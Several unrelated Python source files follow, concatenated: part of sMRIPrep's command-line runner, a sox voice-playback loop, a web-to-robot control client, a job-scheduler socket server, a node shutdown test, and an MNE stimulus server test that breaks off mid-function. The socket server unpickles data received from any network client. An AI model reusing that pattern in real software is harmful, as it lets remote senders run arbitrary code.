'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the sMRIPrep developers. This information helps to '
'improve sMRIPrep and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
return parser
def build_opts(opts):
"""Trigger a new process that builds the workflow graph, based on the input options."""
import os
from pathlib import Path
import logging
import sys
import gc
import warnings
from multiprocessing import set_start_method, Process, Manager
from nipype import logging as nlogging
from niworkflows.utils.misc import check_valid_fs_license
set_start_method('forkserver')
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
warnings.showwarning = _warn_redirect
# Precedence: --fs-license-file, $FS_LICENSE, default_license
if opts.fs_license_file is not None:
os.environ["FS_LICENSE"] = os.path.abspath(opts.fs_license_file)
if not check_valid_fs_license():
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'sMRIPrep looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html'
)
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
smriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
bids_dir = retval['bids_dir']
output_dir = retval['output_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
retcode = retval['return_code']
if smriprep_wf is None:
sys.exit(1)
if opts.write_graph:
smriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
# Check workflow for missing commands
missing = check_deps(smriprep_wf)
if missing:
print("Cannot run sMRIPrep. Missing dependencies:")
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
smriprep_wf.run(**plugin_settings)
except RuntimeError:
errno = 1
else:
if opts.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(Path(output_dir) / 'smriprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(Path(output_dir) / 'smriprep' / 'desc-aparcaseg_dseg.tsv'))
logger.log(25, 'sMRIPrep finished without errors')
finally:
from niworkflows.reports import generate_reports
from ..utils.bids import write_derivative_description
logger.log(25, 'Writing reports for participants: %s', ', '.join(subject_list))
# Generate reports phase
errno += generate_reports(subject_list, output_dir, run_uuid,
packagename='smriprep')
write_derivative_description(bids_dir, str(Path(output_dir) / 'smriprep'))
sys.exit(int(errno > 0))
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows smriprep to enforce
a hard-limited memory-scope.
"""
from shutil import copyfile
from os import cpu_count
import uuid
from time import strftime
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
import json
from bids import BIDSLayout
from nipype import logging, config as ncfg
from niworkflows.utils.bids import collect_participants
from ..__about__ import __version__
from ..workflows.base import init_smriprep_wf
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running sMRIPrep version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
{spaces}
""".format
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = opts.bids_dir.resolve()
layout = BIDSLayout(str(bids_dir), validate=False)
subject_list = collect_participants(
layout, participant_label=opts.participant_label)
bids_filters = json.loads(opts.bids_filter_file.read_text()) if opts.bids_filter_file else None
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nprocs = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nprocs is None or opts.nprocs is not None:
nprocs = opts.nprocs
if nprocs is None or nprocs < 1:
nprocs = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nprocs
if opts.mem_gb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_gb
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nprocs - 1 if nprocs > 1 else cpu_count(), 8)
if 1 < nprocs < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'available CPUs (--nprocs/--ncpus=%d)', omp_nthreads, nprocs)
# Set up directories
output_dir = opts.output_dir.resolve()
log_dir = output_dir / 'smriprep' / 'logs'
work_dir = opts.work_dir.resolve()
# Check and create output and working directories
log_dir.mkdir(parents=True, exist_ok=True)
work_dir.mkdir(parents=True, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': str(log_dir),
'log_to_file': True
},
'execution': {
'crashdump_dir': str(log_dir),
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['bids_dir'] = str(bids_dir)
retval['output_dir'] = str(output_dir)
retval['work_dir'] = str(work_dir)
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
from niworkflows.reports import generate_reports
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, str(output_dir), run_uuid,
packagename="smriprep")
return retval
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid,
spaces=opts.output_spaces)
)
# Build main workflow
retval['workflow'] = init_smriprep_wf(
debug=opts.sloppy,
fast_track=opts.fast_track,
freesurfer=opts.run_reconall,
fs_subjects_dir=opts.fs_subjects_dir,
hires=opts.hires,
layout=layout,
longitudinal=opts.longitudinal,
low_mem=opts.low_mem,
omp_nthreads=omp_nthreads,
output_dir=str(output_dir),
run_uuid=run_uuid,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
skull_strip_mode=opts.skull_strip_mode,
skull_strip_template=opts.skull_strip_template[0],
spaces=opts.output_spaces,
subject_list=subject_list,
work_dir=str(work_dir),
bids_filters=bids_filters,
)
retval['return_code'] = 0
boilerplate = retval['workflow'].visit_desc()
(log_dir / 'CITATION.md').write_text(boilerplate)
logger.log(25, 'Works derived from this sMRIPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('smriprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
'--metadata', 'pagetitle="sMRIPrep citation boilerplate"',
str(log_dir / 'CITATION.md'),
'-o', str(log_dir / 'CITATION.html')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTex file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('smriprep', 'data/boilerplate.bib'),
'--natbib', str(log_dir / 'CITATION.md'),
'-o', str(log_dir / 'CITATION.tex')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
else:
copyfile(pkgrf('smriprep', 'data/boilerplate.bib'), str(log_dir / 'CITATION.bib'))
return retval
if __name__ == '__main__':
raise RuntimeError("smriprep/cli/run.py should not be run directly;\n"
"Please `pip install` smriprep and use the `smriprep` command")
|
_v4__speech_playvoice.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import queue
import threading
import subprocess
import datetime
import time
import codecs
import glob
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
# qFunc 共通ルーチン
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
qPLATFORM = qFunc.getValue('qPLATFORM' )
qRUNATTR = qFunc.getValue('qRUNATTR' )
qHOSTNAME = qFunc.getValue('qHOSTNAME' )
qUSERNAME = qFunc.getValue('qUSERNAME' )
qPath_pictures = qFunc.getValue('qPath_pictures' )
qPath_videos = qFunc.getValue('qPath_videos' )
qPath_cache = qFunc.getValue('qPath_cache' )
qPath_sounds = qFunc.getValue('qPath_sounds' )
qPath_icons = qFunc.getValue('qPath_icons' )
qPath_fonts = qFunc.getValue('qPath_fonts' )
qPath_log = qFunc.getValue('qPath_log' )
qPath_work = qFunc.getValue('qPath_work' )
qPath_rec = qFunc.getValue('qPath_rec' )
qPath_s_ctrl = qFunc.getValue('qPath_s_ctrl' )
qPath_s_inp = qFunc.getValue('qPath_s_inp' )
qPath_s_wav = qFunc.getValue('qPath_s_wav' )
qPath_s_jul = qFunc.getValue('qPath_s_jul' )
qPath_s_STT = qFunc.getValue('qPath_s_STT' )
qPath_s_TTS = qFunc.getValue('qPath_s_TTS' )
qPath_s_TRA = qFunc.getValue('qPath_s_TRA' )
qPath_s_play = qFunc.getValue('qPath_s_play' )
qPath_v_ctrl = qFunc.getValue('qPath_v_ctrl' )
qPath_v_inp = qFunc.getValue('qPath_v_inp' )
qPath_v_jpg = qFunc.getValue('qPath_v_jpg' )
qPath_v_detect = qFunc.getValue('qPath_v_detect' )
qPath_v_cv = qFunc.getValue('qPath_v_cv' )
qPath_v_photo = qFunc.getValue('qPath_v_photo' )
qPath_v_msg = qFunc.getValue('qPath_v_msg' )
qPath_d_ctrl = qFunc.getValue('qPath_d_ctrl' )
qPath_d_play = qFunc.getValue('qPath_d_play' )
qPath_d_prtscn = qFunc.getValue('qPath_d_prtscn' )
qPath_d_movie = qFunc.getValue('qPath_d_movie' )
qPath_d_upload = qFunc.getValue('qPath_d_upload' )
qBusy_dev_cpu = qFunc.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qFunc.getValue('qBusy_dev_com' )
qBusy_dev_mic = qFunc.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qFunc.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qFunc.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qFunc.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qFunc.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qFunc.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qFunc.getValue('qBusy_s_inp' )
qBusy_s_wav = qFunc.getValue('qBusy_s_wav' )
qBusy_s_STT = qFunc.getValue('qBusy_s_STT' )
qBusy_s_TTS = qFunc.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qFunc.getValue('qBusy_s_TRA' )
qBusy_s_play = qFunc.getValue('qBusy_s_play' )
qBusy_v_ctrl = qFunc.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qFunc.getValue('qBusy_v_inp' )
qBusy_v_QR = qFunc.getValue('qBusy_v_QR' )
qBusy_v_jpg = qFunc.getValue('qBusy_v_jpg' )
qBusy_v_CV = qFunc.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qFunc.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qFunc.getValue('qBusy_d_inp' )
qBusy_d_QR = qFunc.getValue('qBusy_d_QR' )
qBusy_d_rec = qFunc.getValue('qBusy_d_rec' )
qBusy_d_play = qFunc.getValue('qBusy_d_play' )
qBusy_d_browser = qFunc.getValue('qBusy_d_browser')
qBusy_d_upload = qFunc.getValue('qBusy_d_upload' )
qRdy__s_force = qFunc.getValue('qRdy__s_force' )
qRdy__s_fproc = qFunc.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qFunc.getValue('qRdy__s_sendkey')
qRdy__v_reader = qFunc.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qFunc.getValue('qRdy__v_sendkey')
qRdy__d_reader = qFunc.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qFunc.getValue('qRdy__d_sendkey')
playvoice_start=0
playvoice_beat =0
playvoice_busy =False
playvoice_last =0
playvoice_seq =0
def proc_playvoice(cn_r, cn_s, ):
global playvoice_start
global playvoice_beat
global playvoice_busy
global playvoice_last
global playvoice_seq
qFunc.logOutput('play_voice:init')
runMode = cn_r.get()
micDev = cn_r.get()
micType = cn_r.get()
micGuide = cn_r.get()
cn_r.task_done()
qFunc.logOutput('play_voice:runMode =' + str(runMode ))
qFunc.logOutput('play_voice:micDev =' + str(micDev ))
qFunc.logOutput('play_voice:micType =' + str(micType ))
qFunc.logOutput('play_voice:micGuide=' + str(micGuide))
qFunc.logOutput('play_voice:start')
playvoice_start=time.time()
while (True):
playvoice_beat = time.time()
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if (mode_get is None):
qFunc.logOutput('playvoice_:None=break')
break
if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
qFunc.logOutput('playvoice_: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
if (mode_get == 'PASS'):
#playvoice_last = time.time()
cn_s.put(['PASS', ''])
else:
playvoice_busy = True
onece = True
result = 'OK'
path=qPath_s_play
files = glob.glob(path + '*')
if (len(files) > 0):
try:
for f in files:
file=f.replace('\\', '/')
if (file[-4:].lower() == '.wav' and file[-8:].lower() != '.tmp.wav'):
f1=file
f2=file[:-4] + '.tmp.wav'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-4:].lower() == '.mp3' and file[-8:].lower() != '.tmp.mp3'):
f1=file
f2=file[:-4] + '.tmp.mp3'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-8:].lower() == '.tmp.wav' or file[-8:].lower() == '.tmp.mp3'):
f1=file
f2=file[:-8] + file[-4:]
try:
os.rename(f1, f2)
file=f2
except:
pass
fileId = file.replace(path, '')
fileId = fileId[:-4]
playvoice_seq += 1
if (playvoice_seq >= 10000):
playvoice_seq = 1
seq4 = '{:04}'.format(playvoice_seq)
seq2 = seq4[-2:]
wrkfile = qPath_work + 'playvoice.' + seq2 + '.mp3'
if (os.path.exists(wrkfile)):
try:
os.remove(wrkfile)
except:
pass
sox=subprocess.Popen(['sox', '-q', file, wrkfile, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (micDev.isdigit()):
os.remove(file)
if (os.path.exists(wrkfile)):
if (onece == True):
onece = False
qFunc.statusSet(qBusy_s_play, True)
#qFunc.statusCheck(qBusy_s_ctrl, 3)
#qFunc.statusCheck(qBusy_s_STT , 3)
#qFunc.statusCheck(qBusy_s_TTS , 3)
#qFunc.statusCheck(qBusy_s_play, 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qFunc.statusCheck(qBusy_s_inp, 3)
if (runMode == 'debug') or (not micDev.isdigit()):
qFunc.logOutput('play_voice:' + fileId + u' → ' + wrkfile[:-4])
playvoice_last = time.time()
sox=subprocess.Popen(['sox', '-q', wrkfile, '-d', '--norm', ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#if (not micDev.isdigit()):
if (runMode=='debug' or runMode=='live'):
sox.wait()
sox.terminate()
sox = None
except:
pass
result = 'NG'
if (not micDev.isdigit()):
if (result == 'OK'):
cn_s.put(['END', ''])
time.sleep( 5.00)
break
else:
cn_s.put(['ERROR', ''])
time.sleep( 5.00)
break
else:
cn_s.put([result, ''])
playvoice_busy = False
qFunc.statusSet(qBusy_s_play, False)
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
qFunc.logOutput('play_voice:terminate')
while (cn_r.qsize() > 0):
try:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
except:
pass
qFunc.logOutput('play_voice:end')
def main_init(micDev, ):
qFunc.makeDirs('temp/_log/', False)
qFunc.makeDirs('temp/_cache/', False)
if (micDev.isdigit()):
qFunc.makeDirs(qPath_s_ctrl, False)
qFunc.makeDirs(qPath_s_inp, False)
qFunc.makeDirs(qPath_s_wav, False)
qFunc.makeDirs(qPath_s_jul, False)
qFunc.makeDirs(qPath_s_STT, False)
qFunc.makeDirs(qPath_s_TTS, False)
qFunc.makeDirs(qPath_s_TRA, False)
qFunc.makeDirs(qPath_s_play, True )
qFunc.makeDirs(qPath_rec, False)
qFunc.makeDirs(qPath_work, False)
else:
qFunc.makeDirs(qPath_s_ctrl, False)
qFunc.makeDirs(qPath_s_inp, False)
qFunc.makeDirs(qPath_s_wav, False)
qFunc.makeDirs(qPath_s_jul, False)
qFunc.makeDirs(qPath_s_STT, False)
qFunc.makeDirs(qPath_s_TTS, False)
qFunc.makeDirs(qPath_s_TRA, False)
qFunc.makeDirs(qPath_s_play, False)
qFunc.makeDirs(qPath_rec, False)
qFunc.makeDirs(qPath_work, False)
qFunc.statusSet(qBusy_s_ctrl, False )
qFunc.statusSet(qBusy_s_inp, False )
qFunc.statusSet(qBusy_s_wav, False )
qFunc.statusSet(qBusy_s_STT, False )
qFunc.statusSet(qBusy_s_TTS, False )
qFunc.statusSet(qBusy_s_TRA, False )
qFunc.statusSet(qBusy_s_play, False )
main_start=0
main_beat =0
main_busy =False
main_last =0
if (__name__ == '__main__'):
# 共通クラス
qFunc.init()
# ログ設定
qNowTime = datetime.datetime.now()
qLogFile = qPath_log + qNowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qFunc.logFileSet(file=qLogFile, display=True, outfile=True, )
qFunc.logOutput(qLogFile, )
qFunc.logOutput('')
qFunc.logOutput('play_main_:init')
qFunc.logOutput('play_main_:exsample.py runMode, mic..., ')
#runMode live, translator, speech, ...,
#micDev num or file
#micType usb or bluetooth
#micGuide off, on, display, sound
runMode = 'debug'
micDev = '0'
micType = 'usb'
micGuide = 'on'
micLevel = '777'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
if (len(sys.argv) >= 3):
micDev = str(sys.argv[2]).lower()
if (len(sys.argv) >= 4):
micType = str(sys.argv[3]).lower()
if (len(sys.argv) >= 5):
micGuide = str(sys.argv[4]).lower()
if (len(sys.argv) >= 6):
p = str(sys.argv[5]).lower()
if (p.isdigit() and p != '0'):
micLevel = p
qFunc.logOutput('')
qFunc.logOutput('play_main_:runMode =' + str(runMode ))
qFunc.logOutput('play_main_:micDev =' + str(micDev ))
qFunc.logOutput('play_main_:micType =' + str(micType ))
qFunc.logOutput('play_main_:micGuide =' + str(micGuide ))
qFunc.logOutput('play_main_:micLevel =' + str(micLevel ))
main_init(micDev, )
qFunc.logOutput('')
qFunc.logOutput('play_main_:start')
main_start = time.time()
main_beat = 0
playvoice_s = queue.Queue()
playvoice_r = queue.Queue()
playvoice_proc = None
playvoice_beat = 0
playvoice_pass = 0
while (True):
main_beat = time.time()
# check voice2wav_last
if (not micDev.isdigit()):
if (playvoice_last == 0):
playvoice_last = time.time()
sec = (time.time() - playvoice_last)
if (sec > 90):
break
# Thread timeout check
if (playvoice_beat != 0):
if (micDev.isdigit()):
sec = (time.time() - playvoice_beat)
if (sec > 60):
qFunc.logOutput('play_main_:playvoice_proc 60s')
qFunc.logOutput('play_main_:playvoice_proc break')
playvoice_s.put([None, None])
time.sleep(3.00)
playvoice_proc = None
playvoice_beat = 0
playvoice_pass = 0
#kill = subprocess.Popen(['_speech_a3_kill_sox.bat', ], \
# stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#kill.wait()
#kill.terminate()
#kill = None
# Thread start
if (playvoice_proc is None):
while (playvoice_s.qsize() > 0):
dummy = playvoice_s.get()
while (playvoice_r.qsize() > 0):
dummy = playvoice_r.get()
playvoice_proc = threading.Thread(target=proc_playvoice, args=(playvoice_s,playvoice_r,))
playvoice_proc.setDaemon(True)
playvoice_s.put(runMode )
playvoice_s.put(micDev )
playvoice_s.put(micType )
playvoice_s.put(micGuide)
playvoice_proc.start()
time.sleep(1.00)
playvoice_s.put(['START', ''])
# processing
if (playvoice_r.qsize() == 0 and playvoice_s.qsize() == 0):
playvoice_s.put(['PROC', ''])
playvoice_pass += 1
else:
playvoice_pass = 0
if (playvoice_pass > 50):
playvoice_s.put(['PASS', ''])
playvoice_pass = 0
break_flag = False
while (playvoice_r.qsize() > 0):
playvoice_get = playvoice_r.get()
playvoice_res = playvoice_get[0]
playvoice_dat = playvoice_get[1]
playvoice_r.task_done()
if (playvoice_res == 'END'):
break_flag = True
if (playvoice_res == 'ERROR'):
break_flag = True
#if (break_flag == True):
# break
time.sleep(0.05)
qFunc.logOutput('')
qFunc.logOutput('play_main_:terminate')
try:
playvoice_s.put( [None, None] )
time.sleep(3.00)
except:
pass
try:
playvoice_proc.join()
except:
pass
qFunc.statusSet(qBusy_s_play, False)
qFunc.logOutput('play_main_:bye!')
|
client_web.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from socket import *
from threading import Thread, Lock
import sys
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# IP of robot
server_ip = str(sys.argv[1])
# port to connect to
server_port = 50007
# currently pressed Keys
pressed_keys = []
# Keys allowed to press
allowed_keys = ['a', 'w', 's', 'd']
# array which will be sent
array_to_send = [0, 0, 0, 0]
# function to lock area before it is used by thread
lock = Lock()
keep_running = True
def running():
return keep_running
# array of bools to encode string
def to_binary(num_list):
bin = ''
# get every item from array and add it to string
for i in num_list:
bin = bin + str(i)
# return encode string
return bin.encode()
class my_handler(BaseHTTPRequestHandler):
def do_GET(self):
global keep_running
if self.path[8] == '1':
keep_running = False
else:
if self.path[0:3] == '/?c':
global array_to_send
lock.acquire()
array_to_send = [self.path[4], self.path[5], self.path[6], self.path[7]]
lock.release()
else:
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
f = open("index.html", "r")
self.wfile.write(str(f.read()))
return
def web_server():
server = HTTPServer(('', 8080), my_handler)
while running():
server.handle_request()
return
# connect to server and send control signals
def connect_to_server():
# connect to the server
s = socket(AF_INET, SOCK_STREAM)
s.connect((server_ip, server_port))
# set reference array to compare that the client only sends by changes
global array_to_send
lastSend = array_to_send[:]
while thread_keys.isAlive():
# lock before entering area
lock.acquire()
# check for changes
if not array_to_send == lastSend:
# send to server
s.send(to_binary(array_to_send))
# copy input of array to reference array
lastSend = array_to_send[:]
# release area
lock.release()
# close connecton to server
s.close()
# init threads for key listener and sender
thread_keys = Thread(target=web_server)
thread_server = Thread(target=connect_to_server)
if __name__ == "__main__":
# start threads
thread_keys.start()
thread_server.start()
|
socketserver.py
|
# coding:utf-8
'''
Created on Feb 17, 2014
@author: magus0219
'''
import socket, logging, threading, pickle
from core.command import Command
def recv_until(socket, suffix):
'''
Receive message suffixed with specified char
@param socket:socket
@param suffix:suffix
'''
message = ''
while not message.endswith(suffix):
data = socket.recv(4096)
if not data:
raise EOFError('Socket closed before we see suffix.')
message += data
return message
class SocketServer(object):
'''
Socket Server
This socket server is started by clockwork server and only used to invoke methods
of JobManager
'''
def __init__(self, host, port, jobmanager):
'''
Constructor
'''
self.host = host
self.port = port
self.jobmanager = jobmanager
self.logger = logging.getLogger("Server.SocketThread")
def handleCommand(self, command):
'''
Handle one request command of client and return server's answer
@param command:Command to handle
This function return a Command object which contains result type and detail
information.
'''
cmd = command.cmd
try:
if cmd == Command.JOB_ADD:
jobid = int(command.data)
self.jobmanager.addJob(jobid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.JOB_REMOVE:
jobid = int(command.data)
self.jobmanager.removeJob(jobid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.JOB_RELOAD:
jobid = int(command.data)
self.jobmanager.reloadJob(jobid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.TASK_RUN_IMMEDIATELY:
jobid, params = command.data
jobid = int(jobid)
task = self.jobmanager.spawnImmediateTask(jobid=jobid, params=params)
return Command(Command.RESULT_SUCCESS, "Successful!", task.get_taskid())
elif cmd == Command.TASK_CANCEL:
taskid = command.data
self.jobmanager.cancelTask(taskid)
return Command(Command.RESULT_SUCCESS, "Successful!")
elif cmd == Command.STATUS:
return Command(Command.RESULT_SUCCESS, self.jobmanager.getServerStatus())
except ValueError, e:
self.logger.exception(e)
return Command(Command.RESULT_FAIL, str(e))
def process(self, conn, address):
'''
Thread entry where new socket created
'''
self.logger.info("Accepted a connection from %s" % str(address))
self.logger.info("Socket connects %s and %s" % (conn.getsockname(), conn.getpeername()))
cmd = pickle.loads(recv_until(conn, '.'))
self.logger.info("Recieve Command:[%s]" % str(cmd))
while cmd.cmd != Command.EXIT:
conn.sendall(pickle.dumps(self.handleCommand(cmd)))
cmd = pickle.loads(recv_until(conn, '.'))
self.logger.info("Recieve Command:[%s]" % str(cmd))
self.logger.info("Socket is Over")
def start(self):
'''
Start the socket server and enter the main loop
'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self.host, self.port))
s.listen(10)
self.logger.info("SocketThread is Listening at %s:%s" % (self.host, str(self.port)))
while True:
conn, address = s.accept()
thread = threading.Thread(target=self.process, args=(conn, address))
thread.daemon = True
thread.start()
if __name__ == '__main__':
server = SocketServer("0.0.0.0", 3993)
server.start()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test monicoind shutdown."""
from test_framework.test_framework import MonicoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(MonicoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_stim_client_server.py
|
import threading
import time
from ...externals.six.moves import queue
from mne.realtime import StimServer, StimClient
from nose.tools import assert_equal, assert_raises
def test_connection():
"""Test TCP/IP connection for StimServer <-> StimClient.
"""
# have to start a thread to simulate the effect of two
# different computers since stim_server.start() is designed to
# be a blocking method
# use separate queues because timing matters
trig_queue1 = queue.Queue()
trig_queue2 = queue.Queue()
# start a thread to emulate 1st client
thread1 = threading.Thread(target=connect_client, args=(trig_queue1,))
thread1.daemon = True
# start another thread to emulate 2nd client
thread2 = threading.Thread(target=connect_client, args=(trig_queue2,))
thread2.daemon = True
with StimServer('localhost', port=4218, n_clients=2) as stim_server:
thread1.start()
thread2.start()
stim_server.start(timeout=1.0) # don't allow test to hang
# Add the trigger to the queue for both clients
stim_server.add_trigger(20)
# the assert_equal must be in the test_connection() method
# Hence communication between threads is necessary
trig1 = trig_queue1.get(timeout=1.0)
trig2 = trig_queue2.get(timeout=1.0)
assert_equal(trig1, 20)
# test if both clients receive the same trigger
assert_equal(trig1, trig2)
# test timeout for stim_server
with StimServer('localhost', port=4218) as stim_server:
assert_raises(StopIteration, stim_server.start, 0.1)
def connect_client(trig_queue):
"""Helper method that instantiates the StimClient.
"""
# just wait till the main thread reaches stim_server.start()
time.sleep(0.2)
# instantiate StimClient
stim_client = StimClient('localhost', port=4218)
